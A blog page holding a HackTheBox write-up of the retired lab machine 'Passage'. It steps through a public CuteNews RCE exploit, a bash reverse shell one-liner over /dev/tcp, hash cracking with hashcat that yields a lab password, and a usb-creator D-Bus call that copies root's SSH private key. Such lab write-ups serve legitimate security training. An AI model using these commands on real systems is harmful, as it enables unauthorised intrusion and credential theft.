<!DOCTYPE html><html lang="en"> <head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>HackTheBox - Passage Writeup · ElleuchX1</title><meta name="description" content="Here's my writeup for the RETIRED machine Atom, Which is a Medium Linux machine!"><link rel="icon" href="/favicon.svg" type="image/svg+xml"><link rel="alternate" type="application/rss+xml" title="ElleuchX1" href="/rss.xml"><meta property="og:title" content="HackTheBox - Passage Writeup · ElleuchX1"><meta property="og:description" content="Here's my writeup for the RETIRED machine Atom, Which is a Medium Linux machine!"><meta property="og:type" content="article"><meta property="og:url" content="https://elleu.ch/posts/htb-passage/"><meta property="og:image" content="https://elleu.ch/og/htb-passage.png"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:image" content="https://elleu.ch/og/htb-passage.png"><script>
      (function () {
        try {
          var t = localStorage.getItem('theme');
          if (!t) t = window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
          document.documentElement.setAttribute('data-theme', t);
        } catch (e) {}
      })();
      document.addEventListener('keydown', function (e) {
        if (e.key !== '/' || e.metaKey || e.ctrlKey || e.altKey) return;
        var t = e.target;
        if (t && (t.tagName === 'INPUT' || t.tagName === 'TEXTAREA' || t.isContentEditable)) return;
        e.preventDefault();
        window.location.href = '/search/';
      });
    </script><link rel="stylesheet" href="/_astro/_id_.mL4ELXTH.css"></head> <body> <a class="skip" href="#main">skip to content</a> <header class="site-header" data-pagefind-ignore> <div class="inner"> <a class="brand" href="/">elleuch<span class="at">:~$</span></a> <nav class="nav" aria-label="Main"> <a href="/posts/" aria-current="page">Posts</a><a href="/notes/">Notes</a><a href="/tags/">Tags</a><a href="/about/">About</a> <a class="search" href="/search/"><kbd>/</kbd></a> <button class="toggle" id="theme-toggle" type="button" aria-label="Toggle theme"> <svg class="i-moon" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <path d="M21 12.8A9 9 0 1 1 11.2 3a7 7 0 0 0 9.8 9.8z"></path> </svg> <svg class="i-sun" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <circle cx="12" cy="12" r="4"></circle> <path d="M12 2v2M12 20v2M4.9 4.9l1.4 1.4M17.7 17.7l1.4 1.4M2 12h2M20 12h2M4.9 19.1l1.4-1.4M17.7 6.3l1.4-1.4"></path> </svg> </button> <script>
  document.getElementById('theme-toggle')?.addEventListener('click', () => {
    const next = document.documentElement.getAttribute('data-theme') === 'dark' ? 'light' : 'dark';
    document.documentElement.setAttribute('data-theme', next);
    try { localStorage.setItem('theme', next); } catch (e) {}
  });
</script> </nav> </div> </header> <main id="main">  <div class="progress" id="progress"></div> <div class="wrap"> <article class="article" data-pagefind-body> <a class="back" href="/posts/">← Posts</a> <header class="article-head"> <h1 data-pagefind-meta="title">HackTheBox - Passage Writeup</h1> <div class="article-meta"> <time datetime="2021-03-06T00:00:00.000Z">2021-03-06</time> <span>2 min read</span> </div> <div class="article-tags"> <a href="/tags/hackthebox/">#HackTheBox</a><a href="/tags/medium/">#Medium</a><a href="/tags/linux/">#Linux</a> </div> </header> <details class="toc" open data-pagefind-ignore> <summary>contents</summary> <ul> <li class="d2"><a href="#nmap-scan">Nmap scan</a></li><li class="d2"><a href="#exploring-the-webserver">Exploring the WebServer</a></li><li class="d2"><a href="#paul-user">Paul user</a></li><li class="d2"><a href="#nadav-user">Nadav user</a></li> </ul> </details> <div class="prose">  <h1 id="information-gathering">Information Gathering</h1>
<h2 id="nmap-scan">Nmap scan</h2>
<p><code>rustscan -a 10.10.10.206 -- -A -sC -sV</code></p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Open 10.10.10.206:22</span></span>
<span class="line"><span>Open 10.10.10.206:80</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)</span></span>
<span class="line"><span></span></span>
<span class="line"><span>| ssh-hostkey: </span></span>
<span class="line"><span>|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)</span></span>
<span class="line"><span>|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)</span></span>
<span class="line"><span>|   256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)</span></span>
<span class="line"><span></span></span>
<span class="line"><span>80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))</span></span>
<span class="line"><span>| http-methods: </span></span>
<span class="line"><span>|_  Supported Methods: GET HEAD POST OPTIONS</span></span>
<span class="line"><span>|_http-server-header: Apache/2.4.18 (Ubuntu)</span></span>
<span class="line"><span>|_http-title: Passage News</span></span>
<span class="line"><span></span></span></code></pre>
<p> We have two ports open 
	Port 22 : OpenSSH 7.2p2
	Port 80 : Apache httpd 2.4.18
</p>
<h2 id="exploring-the-webserver">Exploring the WebServer</h2>
<p>Let’s first add Passage.htb to our hosts file!</p>
<p>We can see that Fail2Ban is Implemented on the server! So no need to waste our time trying bruteforcing dirs and files</p>
<img decoding="async" loading="lazy" alt="fail2ban" src="/assets/img/htb-passage/fail2ban.webp"> 
<p>What really catchs my eye is</p>
<p><code>Powered by CuteNews</code></p>
<p>A simple search on google can reveal the default dir for CuteNews CMS which is /CuteNews/</p>
<p>Let’s see what we get!
<img decoding="async" loading="lazy" alt="cuteCMS" src="/assets/img/htb-passage/cuteCMS.webp">
Nice! We got the CMS version</p>
<p><code>Powered by CuteNews 2.1.2</code></p>
<p>Let’s find a vulnerability related to this version!</p>
<h1 id="initial-foothold">Initial Foothold</h1>
<p>Let’s see what searchsploit has for us!</p>
<img decoding="async" loading="lazy" alt="Searchsploit" src="/assets/img/htb-passage/Searchsploit.webp">
<p>Let’s grab that juicy RCE python exploit</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>searchsploit -m php/webapps/48800.py</span></span></code></pre>
<p>And run our script, We only need to provide <b>	<a href="http://passage.htb">http://passage.htb</a></b></p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>python3 48800.py</span></span></code></pre>
<img decoding="async" loading="lazy" alt="foothold" src="/assets/img/htb-passage/foothold.webp">
<p>And we’re on the box!</p>
<p>Let’s get a proper shell on the box!</p>
<p><code>/bin/bash -c 'bash -i >&#x26; /dev/tcp/&#x3C;IP>/&#x3C;PORT> 0>&#x26;1'</code></p>
<img decoding="async" loading="lazy" alt="pwncat" src="/assets/img/htb-passage/pwncat.webp">
<h1 id="user-privesc">User Privesc</h1>
<h2 id="paul-user">Paul user</h2>
<p>Going through the webserver config, I found an interesting directory</p>
<p><code>/var/www/html/CuteNews/cdata/users</code></p>
<p>Which seem to contain some juicy encoded informations</p>
<img decoding="async" loading="lazy" alt="encoded" src="/assets/img/htb-passage/encoded.webp">
<p>It looks like it’s Base64 encoded!
Let’s decode it</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>a:1:{s:4:"name";a:1:{s:5:"admin";a:8:{s:2:"id";s:10:"1592483047";s:4:"name";s:5:"admin";s:3:"acl";s:1:"1";s:5:"email";s:17:"nadav@passage.htb";s:4:"pass";s:64:"7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1";s:3:"lts";s:10:"1592487988";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}</span></span></code></pre>
<p>Seems like we got nadav and paul’s hash password</p>
<p>It’s a sha2-256 hash, we’re gonna use Hashcat with the rockyou wordlist to crack them!</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>echo "7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1" > hash </span></span>
<span class="line"><span>echo "e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd" > hash</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>hashcat -m 1400 hash /opt/rockyou.txt</span></span></code></pre>
<p>Seems like we were only able to crack paul’s hash!</p>
<img decoding="async" loading="lazy" alt="cracked" src="/assets/img/htb-passage/cracked.webp">
<p><code>paul:atlanta1</code></p>
<p>And grab our user flag</p>
<h2 id="nadav-user">Nadav user</h2>
<p>We can notice that nadav can access paul’s session</p>
<img decoding="async" loading="lazy" alt="ssh" src="/assets/img/htb-passage/ssh.webp">
<p>Let’s see if paul’s can access nadav’s session</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>ssh nadav@passage</span></span></code></pre>
<img decoding="async" loading="lazy" alt="nadav" src="/assets/img/htb-passage/nadav.webp">
<p>It worked!</p>
<h1 id="root-privesc">Root Privesc</h1>
<p>Let’s first run</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>ps -aux</span></span></code></pre>
<p>To see the current running processes!
<img decoding="async" loading="lazy" alt="usb" src="/assets/img/htb-passage/usb.webp">
What really catches me is that root is running, and that’s odd</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>/usr/bin/python3 /usr/share/usb-creator/usb-creator-helper</span></span></code></pre>
<p>A bit a searching/reading from google can lead us to something, which is the ability to get any file we want!</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /dev/shm/id_rsa true</span></span></code></pre>
<img decoding="async" loading="lazy" alt="root1" src="/assets/img/htb-passage/root1.webp">
<p>And we rooted the box!</p>  </div> <nav class="pager" aria-label="Post navigation"> <a href="/posts/htb-luanne/"><span class="lbl">← prev</span>HackTheBox - Luanne Writeup</a> <a class="next" href="/posts/htb-Laboratory/"><span class="lbl">next →</span>HackTheBox - Laboratory Writeup</a> </nav> </article> </div> <aside class="toc-rail" data-pagefind-ignore aria-label="Table of contents"> <div class="lbl">contents</div> <ul> <li class="d2"><a href="#nmap-scan">Nmap scan</a></li><li class="d2"><a href="#exploring-the-webserver">Exploring the WebServer</a></li><li class="d2"><a href="#paul-user">Paul user</a></li><li class="d2"><a href="#nadav-user">Nadav user</a></li> </ul> </aside><button class="to-top" id="to-top" type="button" aria-label="Back to top">↑ top</button>  </main> <footer class="site-footer" data-pagefind-ignore> <div class="inner"> <span>© 2026 ElleuchX1</span> <span> <a href="https://github.com/ElleuchX1">github</a> ·
<a href="https://twitter.com/ElleuchX1">x</a> ·
<a href="/rss.xml">rss</a> ·
<a href="mailto:contact@elleu.ch">mail</a> </span> </div> </footer> </body></html> <script>
  (function () {
    // reading progress + back-to-top
    var bar = document.getElementById('progress');
    var top = document.getElementById('to-top');
    function update() {
      var h = document.documentElement;
      var max = h.scrollHeight - h.clientHeight;
      var pct = max > 0 ? h.scrollTop / max : 0;
      if (bar) bar.style.width = pct * 100 + '%';
      if (top) top.classList.toggle('show', h.scrollTop > 600);
    }
    document.addEventListener('scroll', update, { passive: true });
    if (top) top.addEventListener('click', function () { window.scrollTo({ top: 0, behavior: 'smooth' }); });
    update();

    // permalink anchors on headings
    document.querySelectorAll('.prose h2[id], .prose h3[id]').forEach(function (h) {
      var a = document.createElement('a');
      a.className = 'anchor';
      a.href = '#' + h.id;
      a.setAttribute('aria-label', 'Link to this section');
      a.textContent = '#';
      h.appendChild(a);
    });

    // code blocks: language label + copy button
    document.querySelectorAll('.prose pre.astro-code').forEach(function (pre) {
      var wrap = document.createElement('div');
      wrap.className = 'code';
      pre.parentNode.insertBefore(wrap, pre);
      var bar = document.createElement('div');
      bar.className = 'code-bar';
      var lang = pre.getAttribute('data-language') || 'text';
      var span = document.createElement('span');
      span.className = 'code-lang';
      span.textContent = lang;
      var btn = document.createElement('button');
      btn.type = 'button';
      btn.className = 'copy';
      btn.textContent = 'copy';
      btn.addEventListener('click', function () {
        var text = pre.innerText;
        var done = function () { btn.textContent = 'copied'; setTimeout(function () { btn.textContent = 'copy'; }, 1200); };
        if (navigator.clipboard) { navigator.clipboard.writeText(text).then(done, done); }
        else {
          var ta = document.createElement('textarea'); ta.value = text; document.body.appendChild(ta); ta.select();
          try { document.execCommand('copy'); } catch (e) {} ta.remove(); done();
        }
      });
      bar.appendChild(span);
      bar.appendChild(btn);
      wrap.appendChild(bar);
      wrap.appendChild(pre);
    });
  })();
</script>